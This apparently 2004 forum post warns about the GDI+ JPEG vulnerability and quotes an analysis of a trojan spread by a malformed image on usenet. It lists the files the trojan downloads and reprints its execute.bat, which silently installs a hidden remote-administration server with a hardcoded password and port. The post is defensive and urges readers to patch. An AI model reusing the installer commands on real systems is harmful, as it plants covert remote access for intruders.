As many of you are aware, an exploit involving Microsoft's GDI library (specifically JPEGs) was discovered recently. The exploit is classified by Microsoft and others as "Critical" and affects Windows XP/2003, as well as a variety of Microsoft applications, such as the Office series. (full list found here)
In addition, a toolkit for exploiting the vulnerability was discovered on the 24th to be in circulation around the internet. This toolkit enables a relatively novice attacker to exploit the vulnerability with a minimal amount of effort.
Earlier today, a virus was spotted on usenet that takes advantage of the widespread vulnerability to install a trojan on the target system, which only needs to view the malformed image to become infected. This easy method of infection, in what had been considered an innoculous file type (JPEG), hilights the need to keep Windows Updated, as well as use a virus scanner with current definitions. Windows Update contained the needed patch as of the 14th of September.
Please, update yourself and others.
Here is the important portion of the Virus Announcement, pasted as a quote block so I can edit out certain details.
In addition, a toolkit for exploiting the vulnerability was discovered on the 24th to be in circulation around the internet. This toolkit enables a relatively novice attacker to exploit the vulnerability with a minimal amount of effort.
Earlier today, a virus was spotted on usenet that takes advantage of the widespread vulnerability to install a trojan on the target system, which only needs to view the malformed image to become infected. This easy method of infection, in what had been considered an innoculous file type (JPEG), hilights the need to keep Windows Updated, as well as use a virus scanner with current definitions. Windows Update contained the needed patch as of the 14th of September.
Please, update yourself and others.
Here is the important portion of the Virus Announcement, pasted as a quote block so I can edit out certain details.
jpeg virus in the wild?!
UPDATE: To check to see if you have been infected by this virus, look for a directory
named c:\windows\system32\system\ that has nvsvc.exe and winrun.exe in it.
UPDATE: We have packet logs at <removed> THIS VIRUS IS NASTY!
If you don't know what a jpeg virus is, check out:
http://news.google.com/news?q=jpeg+virus
Swany and I wrote a quick and nasty script to scan every jpeg that comes into Easynews.com.. It paged
my cell phone at 6:47pm PDT on 9/26/2004 for the first hit, and 7:52pm PDT on 9/26/2004 for
the second hit.
Once this JPEG overflowed GDI+, it phoned home, connected to and ftp site and downloaded
almost 2megs of stuff. It installs a trojan that installs itself as a service.
It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
can work on a remote computer exactly as if you were right there at its keyboard."
It phones home to the same IP that is in the usenet post headers. Then it seems
to connect to ftp://***.***.***.***/www/system/ u/p ***/*** (last time I checked, 93 users where logged in!)
it downloads these files:
-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe
and executes 'execute.bat', which looks like:
regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server
it also installs an irc client with this config info:
<irc channel info> -removed